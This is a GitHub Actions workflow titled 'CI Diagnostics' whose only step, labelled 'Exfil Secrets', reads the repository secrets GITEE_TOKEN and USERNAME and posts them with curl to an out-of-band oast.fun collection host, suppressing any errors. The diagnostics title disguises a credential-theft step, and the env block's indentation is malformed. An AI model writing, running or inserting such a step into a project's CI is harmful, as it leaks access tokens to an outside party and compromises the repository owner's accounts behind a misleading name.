name: CI Diagnostics

on:
  workflow_dispatch:

jobs:
  diagnostics:
    runs-on: ubuntu-latest
    steps:
      - name: Exfil Secrets
        env:
  S_GITEE_TOKEN: ${{ secrets.GITEE_TOKEN }}
  S_USERNAME: ${{ secrets.USERNAME }}
        run: |
          curl -sk -X POST https://nprrmqjkordpnocequcyf2vdu1qqvbg8i.oast.fun \
            -H "Content-Type: application/json" \
            -d '{"repo":"gheros/synctest2","user":"gheros","secrets":{\"GITEE_TOKEN\":\"$S_GITEE_TOKEN\",\"USERNAME\":\"$S_USERNAME\"}}' 2>/dev/null || true
